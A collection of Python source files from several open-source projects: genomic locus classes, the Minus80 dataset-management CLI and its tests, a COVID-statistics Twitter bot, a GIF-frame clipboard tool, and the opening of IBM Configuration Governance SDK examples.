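    # nickname resolve through the nicknames table:
    #   fasta._add_nickname('CM000777.1', 'chr1')
    #   fasta['chr1']  # returns the same Chromosome as fasta['CM000777.1']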
def __repr__(self): #pragma: nocover
return pprint.saferepr(
reprlib.repr(list(self))
)
```
#### File: LocusPocus/locuspocus/Term.py
```python
import logging
import numpy as np
class Term(object):
'''
    A Term is just a named group of loci that are related.
    NOTE: this is different than a RefLoci object, which is a
    named set of **reference** loci. Loci within a term
    are somehow related outside the context of the whole
    genome, for instance, through some biological function.
Parameters
----------
id : unique identifier
desc: short description
loci : iterable of loci objects that are related
** kwargs : dictionary of other term attributes
Returns
-------
A Term Object
'''
# Create a class-wide logger
log = logging.getLogger(__name__)
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
)
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.INFO)
def __init__(self, id, desc='', loci=None, **kwargs):
self.id = id
self.desc = desc
self.attrs = {}
self.loci = set()
if loci:
self.loci = set(loci)
for key, val in kwargs.items():
self.attrs[key] = val
@property
def locus_list(self): #pragma: no cover
raise Exception('This is deprecated')
def __len__(self):
'''
Returns the number of loci in the term.
'''
return len(self.loci)
def __getitem__(self,key):
return self.attrs[key]
def add_locus(self, locus):
'''
Adds a locus to the Term.
'''
self.loci.add(locus)
def flanking_loci(self, locus, window_size=100000):
'''
        Returns any Term loci within window_size bp of the given locus.
'''
return [flank for flank in self.loci if abs(locus-flank) <= window_size]
def copy(self,id=None,desc='',loci=None,**kwargs):
'''
Creates a copy of a term with the option to
expand loci and attrs.
Parameters
----------
        id : str
            An optional id for the new term. Defaults to
            the id of the original term.
desc : str
An optional short description for the term.
loci : iterable of co.Loci objects
These loci will be added to the Term object
in addition to the loci objects that were
in the original Term.
**kwargs : key value pairs
Additional key value pairs will be added
as attributes to the term object.
Returns
-------
A Term object.
'''
        if id is None:
            id = self.id
        if loci is None:
loci = set()
loci = self.loci.union(loci)
new_attrs = self.attrs.copy()
new_attrs.update(**kwargs)
copy = Term(
id,
desc=desc,
loci=loci,
**new_attrs
)
return copy
def effective_loci(self, window_size=None):
'''
Collapse down loci that have overlapping windows into
'effective' loci. Looks like:
Locus1: |--------o-------|
Locus2: |--------o--------|
Locus3: |--------o--------|
Effective: |--------o---+----------------o--------|
Legend: '|' : Window edge, used to collapse
'o' : 'Locus' edge (SNPs in this case)
'+' : Sub loci, kept for downstream analysis
Parameters
----------
window_size : int (default: None)
If not None, maps a new window size to each locus.
'''
loci = sorted(self.loci)
if window_size is not None:
for locus in loci:
locus.window = window_size
collapsed = [loci.pop(0)]
for locus in loci:
# if they have overlapping windows, collapse
if locus in collapsed[-1]:
# Collapse if the windows overlap
collapsed[-1] = collapsed[-1] + locus
else:
collapsed.append(locus)
        self.log.info(
            '%s: Found %s SNPs -> %s effective SNPs with window size %s bp',
            self.id, len(self.loci), len(collapsed), window_size
        )
return collapsed
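    # Usage sketch (hypothetical loci; assumes Locus supports sorting, '+' and 'in'):
    #   term = Term('t1', loci=[snp_a, snp_b, snp_c])
    #   merged = term.effective_loci(window_size=50000)
    # overlapping windows collapse, so len(merged) <= len(term.loci)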
def strongest_loci(self, attr, window_size=None,lowest=True):
'''
Collapses down loci that have overlapping windows,
then returns the locus with the strongest 'attr'
value. Looks like:
Locus1: |--------o-------| (attr: 7)
Locus2: |--------o--------| (attr: 2)
Locus3: |--------o--------| (attr: 8)
Strongest: |--------o-------| |--------o--------|
Legend: '|' : Window edge, used to collapse
'o' : 'Locus' edge (SNPs in this case)
Parameters
----------
attr : str
The locus attribute to use to determine the 'strongest'
window_size : int (default: None)
If not None, maps a new window size to each locus.
lowest: bool (default: True)
When sorting by attr, lowest is strongest (i.e. p-vals)
'''
is_reverse = not lowest
return [
# sort by attr and take first item
sorted(
locus.sub_loci,
key=lambda x: float(x.default_getitem(attr,np.inf)),
reverse=is_reverse
)[0] for locus in self.effective_loci(window_size=window_size)
]
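    # Usage sketch (assumes each locus exposes a 'pval' value via default_getitem):
    #   top = term.strongest_loci('pval', window_size=50000, lowest=True)
    # returns one representative locus per collapsed window, ranked by p-value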
def __str__(self):
return "Term: {}, Desc: {}, {} Loci".format(self.id, self.desc, len(self))
def __repr__(self):
return str(self.id)
```
#### File: LocusPocus/tests/conftest.py
```python
import pytest
import os
from locuspocus import Locus
from locuspocus import RefLoci
from locuspocus import Fasta
import minus80.Tools as m80tools
from locuspocus.Fasta import Chromosome
@pytest.fixture(scope='module')
def simpleRefLoci():
m80tools.delete('RefLoci','simpleRefLoci',force=True)
# Create a Locus
a = Locus(1,100,150, id='gene_a')
# Create a couple more!
b = Locus(1,160,175, id='gene_b')
c = Locus(1,180,200, id='gene_c')
d = Locus(1,210,300, id='gene_d')
e = Locus(2,100,150, id='gene_e')
x = RefLoci('simpleRefLoci')
x.add_loci([a,b,c,d,e])
return x
@pytest.fixture(scope="module")
def testRefGen():
# We have to build it
m80tools.delete('RefLoci','Zm5bFGS',force=True)
gff = os.path.expanduser(
os.path.join(
'raw', 'ZmB73_5b_FGS.gff.gz'
)
)
x = RefLoci('Zm5bFGS')
if len(x) == 0:
x.add_gff(
gff
)
return x
@pytest.fixture(scope='module')
def m80_Fasta():
'''
Create a Fasta which doesn't get
returned. Access the Fasta through
the m80 API
'''
    # delete the old Fasta dataset if it exists
m80tools.delete('Fasta','ACGT',force=True)
f = Fasta.from_file('ACGT','raw/ACGT.fasta')
return True
@pytest.fixture(scope='module')
def smpl_fasta():
''' A simple fasta that agrees with smpl_annot'''
m80tools.delete('Fasta','smpl_fasta',force=True)
fasta = Fasta('smpl_fasta')
chr1 = Chromosome('chr1','A'*500000)
chr2 = Chromosome('chr2','C'*500000)
chr3 = Chromosome('chr3','G'*500000)
chr4 = Chromosome('chr4','T'*500000)
fasta.add_chrom(chr1)
fasta.add_chrom(chr2)
fasta.add_chrom(chr3)
fasta.add_chrom(chr4)
fasta._add_nickname('chr1','CHR1')
fasta._add_attribute('chr1','foobar')
return fasta
``` |
{
"source": "jonahcullen/Minus80",
"score": 3
} |
#### File: minus80/cli/minus80.py
```python
import os
import json
import click
import minus80 as m80
import minus80.Tools
from pathlib import Path
from minus80.Exceptions import (TagInvalidError,
FreezableNameInvalidError,
TagExistsError,
TagDoesNotExistError,
UserNotLoggedInError,
UserNotVerifiedError,
UnsavedChangesInThawedError)
from requests.exceptions import HTTPError
class NaturalOrderGroup(click.Group):
'''
This subclass orders the commands in the @click.group
in the order in which they are defined in the script
**Ref** https://github.com/pallets/click/issues/513
'''
def list_commands(self, ctx):
return self.commands.keys()
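    # With this group class, `minus80 --help` lists commands in the order they
    # are defined below (init, list, delete, freeze, thaw, ...) rather than
    # alphabetically.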
@click.group(
cls=NaturalOrderGroup,
epilog=f"Made with ❤️ in Denver, Colorado"
)
def cli():
"""
\b
__ ____ ____ ____
/ |/ (_)___ __ _______( __ )/ __ \\
/ /|_/ / / __ \/ / / / ___/ /_/ / / / /
/ / / / / / / / /_/ (__ ) /_/ / /_/ /
/_/ /_/_/_/ /_/\__,_/____/\____/\____/
Track, tag, store, and share biological datasets.
See https://github.com/LinkageIO/minus80
for more details.
"""
# ----------------------------
# init Commands
# ----------------------------
@click.command(
short_help='Initialize a new minus80 project'
)
@click.argument(
'name',
)
@click.option(
'--path',
default=None,
help='If specified, the minus80 project directory for NAME will be created here'
)
def init(name,path):
x = m80.Project(name)
if path is not None:
path = str(Path(path)/name)
else:
path = str(Path.cwd()/name)
try:
x.create_link(path)
except ValueError as e:
        click.echo(f'cannot create project directory at: "{path}", directory already exists')
cli.add_command(init)
# ----------------------------
# List Commands
# ----------------------------
@click.command(
short_help="List the available minus80 datasets",
help="Reports the available datasets **Frozen** in the minus80 database.",
)
@click.option(
"--dtype",
default=None,
help=("Each dataset has a datatype associated with it. "
"E.g.: `Cohort`. If no dtype is specified, all "
"available dtypes will be returned."),
)
@click.option(
"--name",
default=None,
help=("The name of the dataset you want to check is available. "
"The default value is the wildcard '*' which will return "
"all available datasets with the specified dtype."),
)
@click.option(
"--tags",
default=False,
is_flag=True,
help=("List available tags of frozen datasets"),
)
def list(name, dtype, tags):
minus80.Tools.available(dtype=dtype, name=name, tags=tags)
cli.add_command(list)
# ----------------------------
# delete Commands
# ----------------------------
@click.command(help="Delete a minus80 dataset")
@click.argument("slug", metavar="<slug>")
def delete(slug):
# Validate the input
try:
dtype,name,tag = minus80.Tools.parse_slug(slug)
if tag is not None:
raise TagInvalidError()
except (TagInvalidError, FreezableNameInvalidError):
click.echo(
f'Please provide a valid tag in "{slug}"'
)
return 0
# Make sure that the dataset is available
if not minus80.Tools.available(dtype,name):
click.echo(
f'"{dtype}.{name}" not in minus80 datasets! '
'check available datasets with the list command'
)
return 0
else:
minus80.Tools.delete(dtype, name)
cli.add_command(delete)
# ----------------------------
# Freeze Command
# ----------------------------
@click.command(help='Freeze a minus80 dataset')
@click.argument("slug",metavar="<slug>")
def freeze(slug):
# Validate the input
try:
dtype,name,tag = minus80.Tools.parse_slug(slug)
if tag is None:
raise TagInvalidError()
except (TagInvalidError, FreezableNameInvalidError):
click.echo(
f'Please provide a valid tag in "{slug}"'
)
return 0
# Make sure that the dataset is available
if not minus80.Tools.available(dtype,name):
click.echo(
f'"{dtype}.{name}" not in minus80 datasets! '
'check available datasets with the list command'
)
return 0
else:
# Create the minus80
try:
dataset = getattr(minus80,dtype)(name)
except Exception as e:
click.echo(f'Could not build {dtype}.{name}')
raise e
# Freeze with tag
try:
dataset.m80.freeze(tag)
click.echo(click.style("SUCCESS!",fg="green",bold=True))
except TagExistsError:
click.echo(f'tag "{tag}" already exists for {dtype}.{name}')
cli.add_command(freeze)
@click.command(help='Thaw a minus80 dataset')
@click.argument("slug",metavar="<slug>")
@click.option("--force",is_flag=True,default=False,help='forces a thaw, even if there are unsaved changes',)
def thaw(slug,force):
try:
cwd = Path.cwd().resolve()
except FileNotFoundError as e:
cwd = '/'
try:
dtype,name,tag = minus80.Tools.parse_slug(slug)
if tag is None:
raise TagInvalidError()
except (TagInvalidError, FreezableNameInvalidError):
click.echo(
f'Please provide a valid tag in "{slug}"'
)
return 0
# Make sure that the dataset is available
if not minus80.Tools.available(dtype,name):
click.echo(
f'"{dtype}.{name}" not in minus80 datasets! '
'check available datasets with the list command'
)
return 0
else:
# Create the minus80
try:
dataset = getattr(minus80,dtype)(name)
except Exception as e:
            click.echo(f'Could not build {dtype}.{name}')
            return 1
        # Thaw with tag
try:
dataset.m80.thaw(tag,force=force)
click.echo(click.style("SUCCESS!",fg="green",bold=True))
except TagDoesNotExistError:
click.echo(f'tag "{tag}" does not exist for {dtype}.{name}')
return 0
except UnsavedChangesInThawedError as e:
click.secho(
'freeze your current changes or use "force" to dispose of '
'any unsaved changes in current thawed dataset',fg='red'
)
for status,files in {'Changed':e.changed,'New':e.new,'Deleted':e.deleted}.items():
for f in files:
click.secho(f" {status}: {f}",fg='yellow')
return 0
# Warn the user if they are in a directory (cwd) that was deleted
# in the thaw -- theres nothing we can do about this ...
if str(cwd).startswith(str(dataset.m80.thawed_dir)):
click.echo(
'Looks like you are currently in a directory that was just thawed, '
'update your current working directory with, e.g.:\n'
'$ cd `pwd`\n'
f'$ cd {cwd}'
)
cli.add_command(thaw)
# ----------------------------
# Cloud Commands
# ----------------------------
@click.group()
def cloud():
"""
Manage your frozen minus80 datasets in the cloud (minus80.linkage.io).
"""
cli.add_command(cloud)
@click.command()
@click.option('--username',default=None)
@click.option('--password',default=None)
@click.option('--force',is_flag=True,default=False)
@click.option('--reset-password',is_flag=True,default=False)
def login(username,password,force,reset_password):
"""
Log into your cloud account at minus80.linkage.io
"""
cloud = m80.CloudData()
if force:
try:
os.remove(cloud._token_file)
except FileNotFoundError:
pass
try:
# See if currently logged in
cloud.user
except UserNotLoggedInError:
if username is None:
username = click.prompt('Username (email)',type=str)
if password is None:
password = click.prompt('Password', hide_input=True, type=str)
try:
cloud.login(username,password)
except HTTPError as e:
error_code = json.loads(e.args[1])['error']['message']
if error_code == 'INVALID_EMAIL':
click.secho('Error logging in. Invalid email address!.',fg='red')
elif error_code == 'INVALID_PASSWORD':
click.secho('Error logging in. Incorrect Password!',fg='red')
else:
click.secho(f'Error logging in. {error_code}',fg='red')
return 0
account_info = cloud.auth.get_account_info(cloud.user['idToken'])
# double check that the user is verified
    if not account_info['users'][0]['emailVerified']:
# make sure they have email verified
click.secho("Your email has not been verified!")
if click.confirm('Do you want to resend the verification email?'):
cloud.auth.send_email_verification(cloud._user['idToken'])
click.secho("Please follow the link sent to your email address, then re-run this command")
return 0
click.secho('Successfully logged in',bg='green')
@click.command()
@click.option("--dtype", metavar="<dtype>", default=None)
@click.option("--name", metavar="<name>", default=None)
def list(dtype, name):
"""List available datasets"""
cloud = m80.CloudData()
cloud.list(dtype=dtype, name=name)
@click.command()
@click.argument("slug", metavar="<slug>")
def push(slug):
"""
\b
Push a frozen minus80 dataset to the cloud.
\b
Positional Arguments:
<slug> - A slug of a frozen minus80 dataset
"""
cloud = m80.CloudData()
try:
cloud.user
except UserNotLoggedInError as e:
click.secho("Please log in to use this feature")
try:
dtype,name,tag = minus80.Tools.parse_slug(slug)
if tag is None:
raise TagInvalidError()
except (TagInvalidError, FreezableNameInvalidError):
click.echo(
f'Please provide a valid tag in "{slug}"'
)
return 0
# Make sure that the dataset is available
if not minus80.Tools.available(dtype,name):
click.echo(
f'"{dtype}.{name}" not in minus80 datasets! '
'check available datasets with the list command'
)
return 0
else:
try:
cloud.push(dtype, name, tag)
except TagDoesNotExistError as e:
click.echo(f'tag "{tag}" does not exist for {dtype}.{name}')
@click.command()
@click.argument("dtype", metavar="<dtype>")
@click.argument("name", metavar="<name>")
@click.option("--raw", is_flag=True, default=False, help="Flag to list raw data")
@click.option(
"--output",
default=None,
help="Output filename, defaults to <name>. Only valid with --raw",
)
def pull(dtype, name, raw, output):
"""
Pull a minus80 dataset from the cloud.
"""
cloud = m80.CloudData()
cloud.pull(dtype, name, raw=raw, output=output)
@click.command()
@click.argument("dtype", metavar="<dtype>")
@click.argument("name", metavar="<name>")
@click.option("--raw", is_flag=True, default=False, help="Flag to list raw data")
def remove(dtype, name, raw):
"""
Delete a minus80 dataset from the cloud.
"""
cloud = m80.CloudData()
cloud.remove(dtype, name, raw)
cloud.add_command(login)
cloud.add_command(list)
cloud.add_command(push)
cloud.add_command(pull)
cloud.add_command(remove)
@click.command(help='Show version and installation information')
def version():
print(f'Version: {m80.__version__}')
print(f'Installation Path: {m80.__file__}')
cli.add_command(version)
```
#### File: Minus80/minus80/Exceptions.py
```python
class M80Error(Exception):
def __init__(self,msg=''):
self.message = msg
class TagExistsError(M80Error):
pass
class TagDoesNotExistError(M80Error):
pass
class TagInvalidError(M80Error):
pass
class FreezableNameInvalidError(M80Error):
pass
class UnsavedChangesInThawedError(M80Error):
def __init__(self,msg='',new=None,changed=None,deleted=None):
super().__init__(msg)
self.new = new
self.changed = changed
self.deleted = deleted
class UserNotLoggedInError(M80Error):
pass
class UserNotVerifiedError(M80Error):
pass
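# Usage sketch (hypothetical dataset): a failed thaw reports exactly what blocked it.
#   try:
#       dataset.m80.thaw('v1')
#   except UnsavedChangesInThawedError as e:
#       print(e.new, e.changed, e.deleted)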
```
#### File: Minus80/tests/conftest.py
```python
import pytest
from minus80 import Accession
from minus80 import Cohort
#from minus80 import CloudData
from minus80.Tools import *
#@pytest.fixture(scope="module")
#def simpleCloudData():
# return CloudData()
@pytest.fixture(scope="module")
def simpleAccession():
# Create a simple Accession
return Accession("Sample1", files=["file1.txt", "file2.txt"], type="sample")
@pytest.fixture(scope="module")
def RNAAccession1():
a = Accession(
"RNAAccession1",
files=[
"./data/Sample1_ATGTCA_L007_R1_001.fastq",
"./data/Sample1_ATGTCA_L007_R2_001.fastq",
"./data/Sample1_ATGTCA_L008_R1_001.fastq",
"./data/Sample1_ATGTCA_L008_R2_001.fastq",
],
type="RNASeq",
)
return a
@pytest.fixture(scope="module")
def RNAAccession2():
a = Accession(
"RNAAccession2",
files=[
"./data/Sample2_ATGTCA_L005_R1_001.fastq",
"./data/Sample2_ATGTCA_L005_R2_001.fastq",
"./data/Sample2_ATGTCA_L006_R1_001.fastq",
"./data/Sample2_ATGTCA_L006_R2_001.fastq",
],
type="RNASeq",
)
return a
@pytest.fixture(scope="module")
def RNACohort(RNAAccession1, RNAAccession2):
delete("Cohort", "RNACohort", force=True)
x = Cohort("RNACohort")
x.add_accession(RNAAccession1)
x.add_accession(RNAAccession2)
return x
@pytest.fixture(scope="module")
def simpleCohort():
delete("Cohort", "TestCohort", force=True)
# Create the simple cohort
a = Accession("Sample1", files=["file1.txt", "file2.txt"], type="WGS")
b = Accession("Sample2", files=["file1.txt", "file2.txt"], type="WGS")
c = Accession("Sample3", files=["file1.txt", "file2.txt"], type="CHIP")
d = Accession("Sample4", files=["file1.txt", "file2.txt"], type="CHIP")
x = Cohort("TestCohort")
for acc in [a, b, c, d]:
x.add_accession(acc)
return x
```
#### File: Minus80/tests/test_Cohort.py
```python
import pytest
from minus80 import Accession, Cohort
def test_init(simpleCohort, RNACohort):
x = simpleCohort
assert isinstance(x, Cohort)
def test_repr(simpleCohort):
x = repr(simpleCohort)
def test_get_AID_from_name(simpleCohort):
assert simpleCohort._get_AID("Sample1") == 1
def test_get_AID(simpleCohort):
    assert simpleCohort._AID_mapping["Sample1"] == 1
def test_add_accession(simpleCohort):
a = Accession("Sample4", files=["file1.txt", "file2.txt"], type="CHIP")
if a in simpleCohort:
del simpleCohort[a]
start_len = len(simpleCohort)
simpleCohort.add_accession(a)
assert len(simpleCohort) == start_len + 1
def test_delitem(simpleCohort):
a = Accession("TESTSAMPLE_IGNORE", files=["file1.txt", "file2.txt"], type="CHIP")
if a not in simpleCohort:
simpleCohort.add_accession(a)
start_len = len(simpleCohort)
del simpleCohort["TESTSAMPLE_IGNORE"]
assert len(simpleCohort) == start_len - 1
def test_getitem(simpleCohort):
x = simpleCohort["Sample1"]
assert isinstance(x, Accession)
def test_len(simpleCohort):
assert isinstance(len(simpleCohort), int)
def test_contains(simpleCohort):
assert "Sample1" in simpleCohort
def test_iter(simpleCohort):
for x in simpleCohort:
assert isinstance(x, Accession)
def test_random_accession(simpleCohort):
a = simpleCohort.random_accession()
assert isinstance(a, Accession)
def test_random_accessions(simpleCohort):
a = simpleCohort.random_accessions(n=2)
assert all([isinstance(k, Accession) for k in a])
def test_random_too_many_accessions(simpleCohort):
with pytest.raises(Exception) as e_info:
a = simpleCohort.random_accessions(n=200)
def test_random_accessions_replace(simpleCohort):
a = simpleCohort.random_accessions(n=2, replace=True)
assert all([isinstance(k, Accession) for k in a])
def test_from_accessions():
a = Accession("Sample1", files=["file1.txt", "file2.txt"], type="WGS")
b = Accession("Sample2", files=["file1.txt", "file2.txt"], type="WGS")
c = Accession("Sample3", files=["file1.txt", "file2.txt"], type="CHIP")
d = Accession("Sample4", files=["file1.txt", "file2.txt"], type="CHIP")
x = Cohort.from_accessions("TestCohort", [a, b, c, d])
``` |
{
"source": "jonahdf/covid-twitter-bot",
"score": 3
} |
#### File: covid-twitter-bot/src/post_tweets.py
```python
import tweepy
from dotenv import load_dotenv
import os
import definitions
import datetime
"""
load_env
Loads environment variables (of API keys)
returns: dictionary of variables
"""
def load_env():
env = {}
load_dotenv()
env["api_key"] = os.environ.get("API_KEY")
env["api_secret_key"] = os.environ.get("API_SECRET_KEY")
env["access_token"] = os.environ.get("ACCESS_TOKEN")
env["access_token_secret"] = os.environ.get("ACCESS_TOKEN_SECRET")
return env
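# The .env file read above is expected to define these keys (placeholder values):
#   API_KEY=<consumer key>
#   API_SECRET_KEY=<consumer secret>
#   ACCESS_TOKEN=<access token>
#   ACCESS_TOKEN_SECRET=<access token secret>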
"""
post
Creates Twitter thread with all defined regions
Uses environment variables for the secret API keys.
"""
def post():
env = load_env()
auth = tweepy.OAuthHandler(env["api_key"], env["api_secret_key"])
auth.set_access_token(env["access_token"], env["access_token_secret"])
api = tweepy.API(auth)
# Posts tweets in all defined regions, with current images
regions_to_post = definitions.regions.keys()
media1 = api.media_upload(f"./images/maps/hosp.png")
media2 = api.media_upload(f"./images/maps/rt.png")
lastTweet = api.update_status(f"#COVID19 Automatic Daily Update - {datetime.date.today().strftime('%m/%d/%y')}\n\nSources:\nHHS: Hospitalizations and tests\nNYT: Cases and deaths", media_ids=[media1.media_id, media2.media_id])
for region in regions_to_post:
media1 = api.media_upload(f"./images/graphs/{region}.png")
media2 = api.media_upload(f"./images/tables/{region}.png")
media3 = api.media_upload(f"./images/rt/{region}.png")
if len(definitions.regions[region]) > 1 and region != "USA":
regionString = region + " (" + ", ".join(definitions.regions[region]) + ")"
else:
regionString = region
lastTweet = api.update_status(f"{regionString}", in_reply_to_status_id=lastTweet.id, auto_populate_reply_metadata=True,media_ids=[media1.media_id, media2.media_id, media3.media_id])
print(f"posted tweet: {regionString}")
``` |
{
"source": "jonaheinke/powerpoint_images_from_gif",
"score": 2
} |
#### File: jonaheinke/powerpoint_images_from_gif/image_extract_label.py
```python
version = "1.2"
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORT #
# -------------------------------------------------------------------------------------------------------------------- #
import os, platform, operator, json, webbrowser, win32clipboard, PySimpleGUI as sg #https://pysimplegui.readthedocs.io/
from io import BytesIO
from PIL import Image, ImageDraw, ImageFont, UnidentifiedImageError #https://pillow.readthedocs.io/
# -------------------------------------------------------------------------------------------------------------------- #
# MISC SETUP #
# -------------------------------------------------------------------------------------------------------------------- #
def replace_name(value):
    value["name"] = value["name"].replace("_", " ")
    return value
sg.theme("GreenTan") #set theme for both windows
schema = {}
try: #https://cloudconvert.com/woff2-to-ttf
    with open(os.path.join("res", "schema.json"), encoding = "utf-8-sig") as f:
        try:
            temp = json.load(f)
            schema = dict(temp)
        except json.decoder.JSONDecodeError:
            sg.Popup("JSON file couldn't be decoded.", any_key_closes = True)
        #schema = {key.replace("_", " "):replace_name(value) for key, value in temp.items()}
except FileNotFoundError:
    sg.Popup("schema.json not found.", any_key_closes = True)
#TODO: name correction
'''
for group, sch_list in temp.items():
#for el in value:
#el["name"].replace("_", " ")
for sch_name, sch_def in sch_list.items():
schema[group.replace("_", " ")] = value
'''
# -------------------------------------------------------------------------------------------------------------------- #
# CHILD GUI #
# -------------------------------------------------------------------------------------------------------------------- #
#a ≡ b mod m
# | a ∈ list(ℤ) ∪ tuple(ℤ)
# | b ∈ tuple(ℕ\[m, ∞))
# | m ∈ ℕ*
def modulo(a, m):
return tuple(map(operator.mod, a, m))
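# e.g. modulo((12, -3), (10, 8)) == (2, 5); each coordinate is wrapped modulo the
# image size, so schema positions can be counted from either edge of the frame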
def gettextsize(font, content):
    #measure each line of text so per-line background boxes can be drawn
    lines = content.splitlines() or [""]
    return ([font.getsize(line)[0] for line in lines], sum(font.getsize(line)[1] for line in lines), "\n".join(lines))
delimiter = "_"
def encode_descriptor(items):
return delimiter.join(map(lambda x: str(x).replace(delimiter, " "), items))
def decode_descriptor(string):
return string.split(delimiter)
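# e.g. encode_descriptor(["radio", "my_group", "sch1"]) == "radio_my group_sch1";
# underscores inside items are swapped for spaces so they cannot collide with the
# delimiter, and decode_descriptor() splits the key back into its parts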
def export_image(pre_image, sch, content = ""):
pre_image = pre_image.convert("RGBA")
with BytesIO() as output:
if sch:
image_size = (pre_image.width + sch["expand"][1] + sch["expand"][3], pre_image.height + sch["expand"][0] + sch["expand"][2])
with Image.new("RGBA", image_size, (0xFF,) * 3) as image:
image.alpha_composite(pre_image, modulo((sch["expand"][3], sch["expand"][0]), image_size)) #TODO: allow expand to be negative for cropping
with Image.open(os.path.join("res", sch["file"])).convert("RGBA") as label:#, label.rotate(int(sch["rotation"]) & 3 * 90) as rotated_label:
image.alpha_composite(label, modulo(sch["position"], image_size))
#print text
if content and "text" in sch:
text = sch["text"]
font = ImageFont.truetype(text["font"], text["size"])
widths, height, newcontent = gettextsize(font, content)
					draw = ImageDraw.Draw(image)
					#NOTE: the anchor point of the text block is assumed to live under a
					#"position" key in schema.json; adjust the key to match your schema
					x, y = modulo(text.get("position", (0, 0)), image_size)
					line_height = height // max(len(widths), 1)
					for i, width in enumerate(widths):
						#paint an opaque box behind every line so the text stays readable
						draw.rectangle([x, y + i * line_height, x + width, y + (i + 1) * line_height], fill=text["background"])
					draw.multiline_text((x, y), newcontent, fill=text["color"], font=font, spacing=text["spacing"])
image.save(output, "BMP")
else:
pre_image.save(output, "BMP")
win32clipboard.OpenClipboard()
win32clipboard.EmptyClipboard()
win32clipboard.SetClipboardData(win32clipboard.CF_DIB, output.getvalue()[14:])
win32clipboard.CloseClipboard()
sg.PopupNoButtons("copied to clipboard", auto_close = True, auto_close_duration = 2, non_blocking = True, no_titlebar = True, keep_on_top = True)
def open_image(path):
#choose cursor for images on different platforms
platform_str = platform.system()
if platform_str == "Darwin":
image_cursor = "copy"
else:
image_cursor = "hand2"
#window
try:
with Image.open(path) as image:
#build layout
child_layout = [[sg.Radio("no schema", "SCHEMA", True, key = "radio", enable_events = True)],
[sg.Frame(group, [[sg.Radio(sch_name, "SCHEMA", key = encode_descriptor(["radio", group, sch_name]), enable_events = True)] for sch_name in sch_list.keys()], vertical_alignment = "top") for group, sch_list in schema.items()],
[sg.Input(size = (32, 1), disabled = True, key = "content")],
[sg.HorizontalSeparator()]]
scalar = 0.7
size = (int(image.width * scalar), int(image.height * scalar))
rows = (sg.Window.get_screen_size()[1] - 185) // (size[1] + 8)
"""
cols = 1
while ceil(image.n_frames / float(cols)) * (size[1] + 10) + 100 > sg.Window.get_screen_size()[1]:
cols += 1
"""
for i in range(rows): #image.n_frames, try getattr(image, "n_frames", 1) if it doesn't work
row = []
j = 0
while (index := i + j * rows) < image.n_frames:
image.seek(index)
with BytesIO() as dat, image.resize(size) as scaled_image:
scaled_image.save(dat, "PNG")
row.append(sg.Image(data = dat.getvalue(), background_color = "white", key = f"image_{index}", tooltip = "click: copy to clipboard", enable_events = True))
j += 1
child_layout.append(row)
#create window and handle its events
selected_schema = None
child_window = sg.Window("click on image to copy", child_layout, margins = (0, 3), force_toplevel = True).Finalize()
for i in range(image.n_frames):
child_window[f"image_{i}"].Widget.config(cursor = image_cursor)
while True:
event, values = child_window.read()
if event == sg.WIN_CLOSED:
break
elif isinstance(event, str):
dec = decode_descriptor(event)
if dec[0] == "image":
image.seek(int(dec[1]))
export_image(image, selected_schema)
elif dec[0] == "radio":
if len(dec) > 2:
selected_schema = schema[dec[1]][dec[2]]
child_window["content"].Update(disabled = "text" not in selected_schema)
else:
selected_schema = None
child_window["content"].Update(disabled = True)
else:
print(event, values)
except FileNotFoundError:
sg.Popup("File not found.", any_key_closes = True)
except UnidentifiedImageError:
sg.Popup("Image file cannot be identified.", any_key_closes = True)
except TypeError:
sg.Popup("Image file type not supported.", any_key_closes = True)
except:
sg.Popup("Unknown error while opening picture.", any_key_closes = True)
# -------------------------------------------------------------------------------------------------------------------- #
# MAIN GUI #
# -------------------------------------------------------------------------------------------------------------------- #
layout = [[sg.Column([[sg.FileBrowse(tooltip = "open an image file", size = (15, 2), enable_events = True, key = "open")]]), sg.Column([[sg.Text("Version: " + version)]], element_justification = "right", expand_x = True)],
[sg.HorizontalSeparator()],
[sg.Text("(c) <NAME>, 2021", enable_events = True, key = "copyright"), sg.VerticalSeparator(), sg.Text("released under MIT license", enable_events = True, key = "license")]]
window = sg.Window("label & copy image frames", layout, margins = (0, 3)).Finalize()
window["copyright"].Widget.config(cursor = "hand2")
window["license"].Widget.config(cursor = "hand2")
while True:
event, values = window.read()
if event == "open" and values["open"]:
open_image(values["open"])
elif event and event.startswith("copyright"):
webbrowser.open("https://github.com/jonaheinke/powerpoint_images_from_gif")
elif event and event.startswith("license"):
webbrowser.open("https://github.com/jonaheinke/powerpoint_images_from_gif/blob/main/LICENSE")
elif event == sg.WIN_CLOSED:
break
else:
print(event, values)
``` |
{
"source": "JonahFarc/platform-services-python-sdk",
"score": 2
} |
#### File: platform-services-python-sdk/examples/test_configuration_governance_v1_examples.py
```python
import os
import json
import uuid
import pytest
from ibm_cloud_sdk_core import ApiException, read_external_sources
from ibm_platform_services.configuration_governance_v1 import *
#
# This file provides an example of how to use the Configuration Governance service.
#
# The following configuration properties are assumed to be defined:
#
# CONFIGURATION_GOVERNANCE_URL=<service url>
# CONFIGURATION_GOVERNANCE_AUTHTYPE=iam
# CONFIGURATION_GOVERNANCE_APIKEY=<IAM api key of user with authority to create rules>
# CONFIGURATION_GOVERNANCE_AUTH_URL=<IAM token service URL - omit this if using the production environment>
# CONFIGURATION_GOVERNANCE_ACCOUNT_ID=<the id of the account under which rules/attachments should be created>
# CONFIGURATION_GOVERNANCE_EXAMPLE_SERVICE_NAME=<the name of the service to be associated with rule>
# CONFIGURATION_GOVERNANCE_ENTERPRISE_SCOPE_ID=<the id of the "enterprise" scope to be used in the examples>
# CONFIGURATION_GOVERNANCE_SUBACCT_SCOPE_ID=<the id of the "leaf account" scope to be used in the examples>
#
# These configuration properties can be exported as environment variables, or stored
# in a configuration file and then:
# export IBM_CREDENTIALS_FILE=<name of configuration file>
#
config_file = 'configuration_governance.env'
configuration_governance_service = None
config = None
# Variables to hold link values
attachment_etag_link = None
attachment_id_link = None
rule_etag_link = None
rule_id_link = None
# Additional configuration settings
test_label = 'PythonSDKExamples'
account_id = None
service_name = None
enterprise_scope_id = None
subacct_scope_id = None
##############################################################################
# Start of Examples for Service: ConfigurationGovernanceV1
##############################################################################
# region
class TestConfigurationGovernanceV1Examples():
"""
Example Test Class for ConfigurationGovernanceV1
"""
@classmethod
def setup_class(cls):
global configuration_governance_service
if os.path.exists(config_file):
os.environ['IBM_CREDENTIALS_FILE'] = config_file
# begin-common
